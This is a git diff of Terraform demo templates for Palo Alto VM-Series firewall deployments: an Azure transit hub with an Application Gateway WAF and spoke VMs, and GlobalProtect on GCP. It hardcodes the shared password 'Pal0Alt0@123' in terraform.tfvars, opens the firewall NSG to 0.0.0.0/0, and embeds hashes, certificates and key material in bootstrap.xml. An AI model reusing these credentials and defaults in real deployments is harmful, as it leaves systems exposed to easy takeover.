b/azure/transit_2fw_2spoke_common_appgw/images/tfvars.png differ diff --git a/azure/transit_2fw_2spoke_common_appgw/modules/appgw/main.tf b/azure/transit_2fw_2spoke_common_appgw/modules/appgw/main.tf new file mode 100644 index 00000000..202714da --- /dev/null +++ b/azure/transit_2fw_2spoke_common_appgw/modules/appgw/main.tf @@ -0,0 +1,75 @@ +#### AppGW2 #### +resource "random_id" "storage_account" { + byte_length = 2 +} + +resource "azurerm_public_ip" "appgw" { + name = "appgw" + location = var.location + resource_group_name = var.resource_group_name + domain_name_label = "appgw-${lower(random_id.storage_account.hex)}" + allocation_method = "Dynamic" +} + +resource "azurerm_application_gateway" "appgw" { + name = "appgw" + location = var.location + resource_group_name = var.resource_group_name + + sku { + name = "WAF_Medium" + tier = "WAF" + capacity = 2 + } + + waf_configuration { + enabled = "true" + firewall_mode = "Prevention" + rule_set_type = "OWASP" + rule_set_version = "3.0" + } + + gateway_ip_configuration { + name = "appgw" + subnet_id = var.subnet_appgw + } + + frontend_port { + name = "http" + port = 80 + } + + frontend_ip_configuration { + name = "appgw" + public_ip_address_id = azurerm_public_ip.appgw.id + } + + backend_address_pool { + name = "BackendPool" + ip_addresses = var.fw_private_ips + + } + + http_listener { + name = "http" + frontend_ip_configuration_name = "appgw" + frontend_port_name = "http" + protocol = "Http" + } + + backend_http_settings { + name = "http" + cookie_based_affinity = "Disabled" + port = 80 + protocol = "Http" + request_timeout = 1 + } + + request_routing_rule { + name = "http" + rule_type = "Basic" + http_listener_name = "http" + backend_address_pool_name = "BackendPool" + backend_http_settings_name = "http" + } +} \ No newline at end of file diff --git a/azure/transit_2fw_2spoke_common_appgw/modules/appgw/outputs.tf b/azure/transit_2fw_2spoke_common_appgw/modules/appgw/outputs.tf new file mode 100644 index 00000000..97cb2d85 --- /dev/null +++ b/azure/transit_2fw_2spoke_common_appgw/modules/appgw/outputs.tf @@ -0,0 +1,3 @@ +output appgw_fqdn { + value = azurerm_public_ip.appgw.fqdn +} diff --git a/azure/transit_2fw_2spoke_common_appgw/modules/appgw/variables.tf b/azure/transit_2fw_2spoke_common_appgw/modules/appgw/variables.tf new file mode 100644 index 00000000..c3dbfab8 --- /dev/null +++ b/azure/transit_2fw_2spoke_common_appgw/modules/appgw/variables.tf @@ -0,0 +1,17 @@ +variable "location" { + description = "Location of the resource group to place App Gateway in." +} + +variable "resource_group_name" { + description = "Name of the resource group to place App Gateway in." +} + +variable "subnet_appgw" { + description = "AppGW Subnet" +} + +variable "fw_private_ips" { + description = "list of private IP addresses from the deployed FW" + type = list(string) + default = null +} \ No newline at end of file diff --git a/azure/transit_2fw_2spoke_common_appgw/modules/azure_bootstrap/main.tf b/azure/transit_2fw_2spoke_common_appgw/modules/azure_bootstrap/main.tf new file mode 100644 index 00000000..1a5c1f7a --- /dev/null +++ b/azure/transit_2fw_2spoke_common_appgw/modules/azure_bootstrap/main.tf @@ -0,0 +1,40 @@ + + +resource "random_string" "randomstring" { + length = 15 + min_lower = 5 + min_numeric = 10 + special = false +} + +resource "azurerm_storage_share" "main" { + name = "${var.name}${random_string.randomstring.result}" + storage_account_name = var.storage_account_name + quota = var.quota +} + +resource "null_resource" "upload" { +provisioner "local-exec" { + command = < + SOURCE & DESTINATION ADDRESSES +
'; +echo ''. "INTERVAL" .': '. $time .'
'; +$localIPAddress = getHostByName(getHostName()); +$sourceIPAddress = getRealIpAddr(); +echo ''. "SOURCE IP" .': '. $sourceIPAddress .'
'; +echo ''. "LOCAL IP" .': '. $localIPAddress .'
'; + +$vm_name = gethostname(); +echo ''. "VM NAME" .': '. $vm_name .'
'; +echo ''. '
'; +echo ' + HEADER INFORMATION +
'; +/* All $_SERVER variables prefixed with HTTP_ are the HTTP headers */ +foreach ($_SERVER as $header => $value) { + if (substr($header, 0, 5) == 'HTTP_') { + /* Strip the HTTP_ prefix from the $_SERVER variable, what remains is the header */ + $clean_header = strtolower(substr($header, 5, strlen($header))); + + /* Replace underscores by the dashes, as the browser sends them */ + $clean_header = str_replace('_', '-', $clean_header); + + /* Cleanup: standard headers are first-letter uppercase */ + $clean_header = ucwords($clean_header, " \t\r\n\f\v-"); + + /* And show'm */ + echo ''. $header .': '. $value .'
'; + } +} +?> diff --git a/azure/transit_2fw_2spoke_common_appgw/scripts/web_startup.yml.tpl b/azure/transit_2fw_2spoke_common_appgw/scripts/web_startup.yml.tpl new file mode 100644 index 00000000..1d02e945 --- /dev/null +++ b/azure/transit_2fw_2spoke_common_appgw/scripts/web_startup.yml.tpl @@ -0,0 +1,10 @@ +#cloud-config + +runcmd: + - sudo apt-get update -y + - sudo apt-get install -y php + - sudo apt-get install -y apache2 + - sudo apt-get install -y libapache2-mod-php + - sudo rm -f /var/www/html/index.html + - sudo wget -O /var/www/html/index.php https://raw.githubusercontent.com/wwce/terraform/master/azure/transit_2fw_2spoke_common/scripts/showheaders.php + - sudo systemctl restart apache2 \ No newline at end of file diff --git a/azure/transit_2fw_2spoke_common_appgw/spokes.tf b/azure/transit_2fw_2spoke_common_appgw/spokes.tf new file mode 100644 index 00000000..a4bf874b --- /dev/null +++ b/azure/transit_2fw_2spoke_common_appgw/spokes.tf @@ -0,0 +1,97 @@ +#----------------------------------------------------------------------------------------------------------------- +# Create spoke1 resource group, spoke1 VNET, spoke1 internal LB, (2) spoke1 VMs + +resource "azurerm_resource_group" "spoke1_rg" { + name = "${var.global_prefix}-${var.spoke1_prefix}-rg" + location = var.location +} + +module "spoke1_vnet" { + source = "./modules/spoke_vnet/" + name = "${var.spoke1_prefix}-vnet" + address_space = var.spoke1_vnet_cidr + subnet_prefixes = var.spoke1_subnet_cidrs + remote_vnet_rg = azurerm_resource_group.transit.name + remote_vnet_name = module.vnet.vnet_name + remote_vnet_id = module.vnet.vnet_id + route_table_destinations = var.spoke_udrs + route_table_next_hop = [var.fw_internal_lb_ip] + location = var.location + resource_group_name = azurerm_resource_group.spoke1_rg.name +} + +data "template_file" "web_startup" { + template = "${file("${path.module}/scripts/web_startup.yml.tpl")}" +} + +module "spoke1_vm" { + source = "./modules/spoke_vm/" + name = "${var.spoke1_prefix}-vm" + vm_count = var.spoke1_vm_count + subnet_id = module.spoke1_vnet.vnet_subnets[0] + availability_set_id = "" + backend_pool_ids = [module.spoke1_lb.backend_pool_id] + custom_data = base64encode(data.template_file.web_startup.rendered) + publisher = "Canonical" + offer = "UbuntuServer" + sku = "16.04-LTS" + username = var.spoke_username + password = var.spoke_password + tags = var.tags + location = var.location + resource_group_name = azurerm_resource_group.spoke1_rg.name +} + +module "spoke1_lb" { + source = "./modules/lb/" + name = "${var.spoke1_prefix}-lb" + type = "private" + sku = "Standard" + probe_ports = [80] + frontend_ports = [80] + backend_ports = [80] + protocol = "Tcp" + enable_floating_ip = false + subnet_id = module.spoke1_vnet.vnet_subnets[0] + private_ip_address = var.spoke1_internal_lb_ip + location = var.location + resource_group_name = azurerm_resource_group.spoke1_rg.name +} + +#----------------------------------------------------------------------------------------------------------------- +# Create spoke2 resource group, spoke2 VNET, spoke2 VM + +resource "azurerm_resource_group" "spoke2_rg" { + name = "${var.global_prefix}-${var.spoke2_prefix}-rg" + location = var.location +} + +module "spoke2_vnet" { + source = "./modules/spoke_vnet/" + name = "${var.spoke2_prefix}-vnet" + address_space = var.spoke2_vnet_cidr + subnet_prefixes = var.spoke2_subnet_cidrs + remote_vnet_rg = azurerm_resource_group.transit.name + remote_vnet_name = module.vnet.vnet_name + remote_vnet_id = module.vnet.vnet_id + route_table_destinations = var.spoke_udrs + route_table_next_hop = [var.fw_internal_lb_ip] + location = var.location + resource_group_name = azurerm_resource_group.spoke2_rg.name +} + +module "spoke2_vm" { + source = "./modules/spoke_vm/" + name = "${var.spoke2_prefix}-vm" + vm_count = var.spoke2_vm_count + subnet_id = module.spoke2_vnet.vnet_subnets[0] + availability_set_id = "" + publisher = "Canonical" + offer = "UbuntuServer" + sku = "16.04-LTS" + username = var.spoke_username + password = var.spoke_password + tags = var.tags + location = var.location + resource_group_name = azurerm_resource_group.spoke2_rg.name +} diff --git a/azure/transit_2fw_2spoke_common_appgw/terraform.tfvars b/azure/transit_2fw_2spoke_common_appgw/terraform.tfvars new file mode 100644 index 00000000..3304b1e6 --- /dev/null +++ b/azure/transit_2fw_2spoke_common_appgw/terraform.tfvars @@ -0,0 +1,43 @@ +#fw_license = "byol" # Uncomment 1 fw_license to select VM-Series licensing mode +#fw_license = "bundle1" +#fw_license = "bundle2" + +global_prefix = "" # Prefix to add to all resource groups created. This is useful to create unique resource groups within a shared Azure subscription +location = "centralus" + +# ----------------------------------------------------------------------- +# VM-Series resource group variables + +fw_prefix = "vmseries" # Adds prefix name to all resources created in the firewall resource group +fw_count = 2 +fw_panos = "9.0.1" +fw_nsg_prefix = "0.0.0.0/0" +fw_username = "paloalto" +fw_password = "Pal0Alt0@123" +fw_internal_lb_ip = "10.0.2.100" + +# ----------------------------------------------------------------------- +# Transit resource group variables + +transit_prefix = "transit" # Adds prefix name to all resources created in the transit vnet's resource group +transit_vnet_cidr = "10.0.0.0/16" +transit_subnet_names = ["mgmt", "untrust", "trust","gateway"] +transit_subnet_cidrs = ["10.0.0.0/24", "10.0.1.0/24", "10.0.2.0/24", "10.0.3.0/24"] + +# ----------------------------------------------------------------------- +# Spoke resource group variables + +spoke1_prefix = "spoke1" # Adds prefix name to all resources created in spoke1's resource group +spoke1_vm_count = 2 +spoke1_vnet_cidr = "10.1.0.0/16" +spoke1_subnet_cidrs = ["10.1.0.0/24"] +spoke1_internal_lb_ip = "10.1.0.100" + +spoke2_prefix = "spoke2" # Adds prefix name to all resources created in spoke2's resource group +spoke2_vm_count = 1 +spoke2_vnet_cidr = "10.2.0.0/16" +spoke2_subnet_cidrs = ["10.2.0.0/24"] + +spoke_username = "paloalto" +spoke_password = "Pal0Alt0@123" +spoke_udrs = ["0.0.0.0/0", "10.1.0.0/16", "10.2.0.0/16"] diff --git a/azure/transit_2fw_2spoke_common_appgw/variables.tf b/azure/transit_2fw_2spoke_common_appgw/variables.tf new file mode 100644 index 00000000..4899c169 --- /dev/null +++ b/azure/transit_2fw_2spoke_common_appgw/variables.tf @@ -0,0 +1,129 @@ +variable location { + description = "Enter a location" +} + +variable fw_prefix { + description = "Prefix to add to all resources added in the firewall resource group" + default = "" +} + +variable fw_license { + description = "VM-Series license: byol, bundle1, or bundle2" + # default = "byol" + # default = "bundle1" + # default = "bundle2" +} + +variable global_prefix { + description = "Prefix to add to all resource groups created. This is useful to create unique resource groups within a shared Azure subscription" +} +#----------------------------------------------------------------------------------------------------------------- +# Transit VNET variables + +variable transit_prefix { +} + +variable transit_vnet_cidr { +} + +variable transit_subnet_names { + type = list(string) +} + +variable transit_subnet_cidrs { + type = list(string) +} + +#----------------------------------------------------------------------------------------------------------------- +# VM-Series variables + +variable fw_count { +} + +variable fw_nsg_prefix { +} + +variable fw_panos { +} + +variable fw_username { +} + +variable fw_password { +} + +variable fw_internal_lb_ip { +} + +#----------------------------------------------------------------------------------------------------------------- +# Spoke variables + +variable spoke_username { +} + +variable spoke_password { +} + +variable spoke_udrs { +} + +variable spoke1_prefix { + description = "Prefix to add to all resources added in spoke1's resource group" +} + +variable spoke1_vm_count { +} + +variable spoke1_vnet_cidr { +} + +variable spoke1_subnet_cidrs { + type = list(string) +} + +variable spoke1_internal_lb_ip { +} + +variable spoke2_prefix { + description = "Prefix to add to all resources added in spoke2's resource group" +} + +variable spoke2_vm_count { +} + +variable spoke2_vnet_cidr { +} + +variable spoke2_subnet_cidrs { + type = list(string) +} + +variable tags { + description = "The tags to associate with newly created resources" + type = map(string) + + default = {} +} + +#----------------------------------------------------------------------------------------------------------------- +# Azure environment variables + +variable client_id { + description = "Azure client ID" + default = "" +} + +variable client_secret { + description = "Azure client secret" + default = "" +} + +variable subscription_id { + description = "Azure subscription ID" + default = "" +} + +variable tenant_id { + description = "Azure tenant ID" + default = "" +} \ No newline at end of file diff --git a/gcp/GP-NoAutoScaling/Guide.pdf b/gcp/GP-NoAutoScaling/Guide.pdf new file mode 100644 index 00000000..8b294c36 Binary files /dev/null and b/gcp/GP-NoAutoScaling/Guide.pdf differ diff --git a/gcp/GP-NoAutoScaling/README.md b/gcp/GP-NoAutoScaling/README.md new file mode 100644 index 00000000..e140aa27 --- /dev/null +++ b/gcp/GP-NoAutoScaling/README.md @@ -0,0 +1,51 @@ +# GlobalProtect in GCP + +Terraform creates a basic GlobalProtect infrastructure consisting of 1 Portal and 2 Gateways (in separate Zones) along with two test Ubuntu servers. + +Please see the [**Deployment Guide**](https://github.com/wwce/terraform/blob/master/gcp/GP-NoAutoScaling/GUIDE.pdf) for more information. + +
+

+ +

+ + +## Prerequistes +* Valid GCP Account with existing project +* Access to GCP Cloud Terminal or to a machine with a Terraform 12 installation + +
+ +## How to Deploy +### 1. Setup & Download Build +In your project, open GCP Cloud Terminal and run the following. +``` +$ gcloud services enable compute.googleapis.com +$ ssh-keygen -f ~/.ssh/gcp-demo -t rsa -C gcp-demo +$ git clone https://github.com/wwce/terraform; cd terraform/gcp/GP-NoAutoScaling +``` + +### 2. Edit terraform.tfvars +Open terraform.tfvars and edit variables (lines 1-4) to match your Billing ID, Project Base Name, SSH Key (from step 1), and Region. + + +### 3. Deploy Build +``` +$ terraform init +$ terraform apply +``` + +
+ +## How to Destroy +Run the following to destroy the build and remove the SSH key created in step 1. +``` +$ terraform destroy +$ rm ~/.ssh/gcp-demo* +``` + +
+ +## Support Policy +The guide in this directory and accompanied files are released under an as-is, best effort, support policy. These scripts should be seen as community supported and Palo Alto Networks will contribute our expertise as and when possible. We do not provide technical support or help in using or troubleshooting the components of the project through our normal support options such as Palo Alto Networks support teams, or ASC (Authorized Support Centers) partners and backline support options. The underlying product used (the VM-Series firewall) by the scripts or templates are still supported, but the support is only for the product functionality and not for help in deploying or using the template or script itself. +Unless explicitly tagged, all projects or work posted in our GitHub repository (at https://github.com/PaloAltoNetworks) or sites other than our official Downloads page on https://support.paloaltonetworks.com are provided under the best effort policy. diff --git a/gcp/GP-NoAutoScaling/bootstrap-gateway.tf b/gcp/GP-NoAutoScaling/bootstrap-gateway.tf new file mode 100644 index 00000000..d5249b81 --- /dev/null +++ b/gcp/GP-NoAutoScaling/bootstrap-gateway.tf @@ -0,0 +1,31 @@ +resource "google_storage_bucket" "gateway_bucket" { + name = "gateway-${random_id.random_number.hex}" + storage_class = "REGIONAL" + location = var.GCP_Region + project = google_project.globalprotect.number +} +resource "google_storage_bucket_object" "gateway_bootstrap" { + name = "config/bootstrap.xml" + source = "bootstrap-gateway/bootstrap.xml" + bucket = google_storage_bucket.gateway_bucket.name +} +resource "google_storage_bucket_object" "gateway_init_cfg" { + name = "config/init-cfg.txt" + source = "bootstrap-gateway/init-cfg.txt" + bucket = google_storage_bucket.gateway_bucket.name +} +resource "google_storage_bucket_object" "gateway_content" { + name = "content/null.txt" + source = "bootstrap-gateway/null.txt" + bucket = google_storage_bucket.gateway_bucket.name +} +resource "google_storage_bucket_object" "gateway_software" { + name = "software/null.txt" + source = "bootstrap-gateway/null.txt" + bucket = google_storage_bucket.gateway_bucket.name +} +resource "google_storage_bucket_object" "gateway_license" { + name = "license/null.txt" + source = "bootstrap-gateway/null.txt" + bucket = google_storage_bucket.gateway_bucket.name +} \ No newline at end of file diff --git a/gcp/GP-NoAutoScaling/bootstrap-gateway/bootstrap.xml b/gcp/GP-NoAutoScaling/bootstrap-gateway/bootstrap.xml new file mode 100644 index 00000000..6da28cec --- /dev/null +++ b/gcp/GP-NoAutoScaling/bootstrap-gateway/bootstrap.xml @@ -0,0 +1,647 @@ + + + + + + + + yes + + + $1$afhulhyx$P9pkv4/MiYY070qlWmN.v0 + c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFERmRyZmRqUUFSL2NnelVSRTYwLzFKbHFoWXEra3FIeGNxMlpOTTR5VkRobVZ3K2dnUXBxTWQwdG8yRmRZeXV4bUhHdVF4bGFMQkp4UDBtcW5LU3A2eUhqZ2orMTRHK29oYVpKbW5Bd3A2YXVkbXVHVkVEMnliVmZvcGc2dlh3WVdIaFdsSlk3N25ESStxQ1U1blRlMjlZNlpvU29PYmJZWkFqZjY5TXRBUzF2blEwZHduUzk2MEo4ZGdoWjMxK2Z5bTFWdDB5WFlmZ0JPYU4yK0JiK0dRa1dreEQ3UHErUEVYd3EvdysyajZ3d3ZmbEVGQVVkNXNMejh2TzBVMDBEYVZiVFVvMkFoR1VRZndlNVJsTDNTQzdzaTRQdDdYMWVsK2swTW54ZzMyUkt6UFM0ZHd6emYxRklJR2VhYVNnbVFNMGRuQ0hxYjNnMzdzWWpybWFVSGo= + + + + + + + + + + + + + yes + 5 + + + yes + 5 + + + yes + 5 + + + yes + 10 + + + yes + 5 + + + + yes + + + + 10 + 10 + + 100 + 50 + + + + 10 + 10 + + 100 + 50 + + + + + + 100 + yes + + + + + a0cb01b7 + e8d8421e + Mar 24 17:02:26 2020 GMT + /CN=GP-CA + Mar 24 17:02:26 2021 GMT + dummy-gw-cert + 1616605346 + no + /CN=dummy-gw-cert + -----BEGIN CERTIFICATE----- +MIIDFDCCAfygAwIBAgIFAIsWwrMwDQYJKoZIhvcNAQELBQAwEDEOMAwGA1UEAxMF +R1AtQ0EwHhcNMjAwMzI0MTcwMjI2WhcNMjEwMzI0MTcwMjI2WjAYMRYwFAYDVQQD +Ew1kdW1teS1ndy1jZXJ0MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA +stP0zbfGt7hagWFqN1AD8HsQC1MtPNJRif9TCdskkm15k4nNQmk17ynuXKQNolBB +hoT+HyUN3AISxJ59QiEuwM0ZSta8PeYrgRSs1fFBWYx1o8Iel9uIGVt+wA81bgau +fNa1xkKjEDf/9gUoIS/pshitwxzmdp9b5EAgP6AnMfvHQynITzE1hxB9vTh0V8kW +glQ8H6s0PkxUaLoHmNhjj3Zwcg7FdiIgzJGOKK6fo/89Mc4BnqNLNqlvqzJC5meT +hdiZFwn/8O9urfKFRp36ZUp+FDHSYIhATiW1MhyiAEfxvjtTeNT9nffhDTC+obJO +lUSkc3fkuqnQ4pJH/29/LQIDAQABo20wazAJBgNVHRMEAjAAMAsGA1UdDwQEAwID +uDAnBgNVHSUEIDAeBggrBgEFBQcDAQYIKwYBBQUHAwIGCCsGAQUFBwMFMAkGA1Ud +IwQCMAAwHQYDVR0OBBYEFD+qH0n0MvDc7amKUccXYBTXYMfMMA0GCSqGSIb3DQEB +CwUAA4IBAQB3R44cMm/JqxiXoId8/7oFb9WfBrkBV77QXg9aDec34x4PjEYbRpDb +9S+WFhWAG344MHluqsZuJF8PLtLSruNSfw4wxymMnHTKvn6yUT9o1Kseh/iRtFW4 +Oyog93g29rnqfVnJ1IslkgIdSB+LeW1wjOvIYcAfRQj0qFp4RK9esoJG4vvDTDI5 +BsmRqxR3aa9BY74wZMrnG5xby+Eyfo6RXzmjuR765yRO5HQSGQQhkKa+OhjkXrKA +KlciqAIoD2NIusdlPUJtlyG0TKgq859+dICv2QTGxvT6YYt0eMR/85q/M1ydEiPd +G4K6WWOKEwaJ5f9vyjCOTi42OJFzSOZq +-----END CERTIFICATE----- + + RSA + -AQ==upj09hPum45JJ00xXyKBB3Q5ZeY=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 + + + e8d8421e + e8d8421e + Mar 24 17:00:47 2020 GMT + /CN=GP-CA + Mar 24 17:00:47 2021 GMT + GP-CA + 1616605247 + yes + /CN=GP-CA + -----BEGIN CERTIFICATE----- +MIICwDCCAaigAwIBAgIJAMn5gXdRd5x1MA0GCSqGSIb3DQEBCwUAMBAxDjAMBgNV +BAMTBUdQLUNBMB4XDTIwMDMyNDE3MDA0N1oXDTIxMDMyNDE3MDA0N1owEDEOMAwG +A1UEAxMFR1AtQ0EwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDBGFGm +/Z+y3AcfqmxOn4RJwF7tA7bh1usgi7nZF5/JELLr0fSXvDqk41pT0Kzm3GWcdZ8b +4kV1aLNfxWleozPGL4Ezl7z4xkc0kcntK3VpkK4+6/16hZBuQF9roqB0my1HlfRG +eWBf7bye4ARqmiENuSC5YphS4KJOSoZ4h52hcSsXAcmD+FmtoOtckkvEl5TBhMQX +Gt4N4FOsuUszQtbql6xNDAFmdXc4YajUVkUM3CRcMTRO+A2YbbRzvwUnGA3wueBb +1C5JQGHd/lTzbEgTmeRDHvIyx8sruMOuYPQbg8d3JxGT6MZcXRCAJHCpWSXg3WZd +vBoHuk/ZWNKqdMUPAgMBAAGjHTAbMAwGA1UdEwQFMAMBAf8wCwYDVR0PBAQDAgIE +MA0GCSqGSIb3DQEBCwUAA4IBAQB+eexIJn99kuJpWAVyh/W+pT1Ah52S8fQi/GJc +DfxELZqsIg7VkkcZFZJ2aefQpoHp4avKyreUsAG6PnkR9DgNZVBJRe0PDxVf6C+T +1HvE863NThiRUJi3l1GMaI+xQPKg83ceRsqOAqMzYtf/Xq+/XaawCcBei/9bGqpr +AJHtvcgiO99yaQnu0hQ5K72Dn0v8ABbF6XyCSSuItdsaltS5XAlHp60+Mcq1R1eh +n01P4VF6sz5Qsdu49743ja4rd68E/Vd+SQoSroZArOwjLE+dNItiPwgL217HQQqx +6GgUahzsIr9nAQ59i6s3U4WY2bHZqL94GLdJfTq1dIyktMsz +-----END CERTIFICATE----- + + RSA + -AQ==Lw22pTLfVHUfvaPxm5QAxE/9jX4=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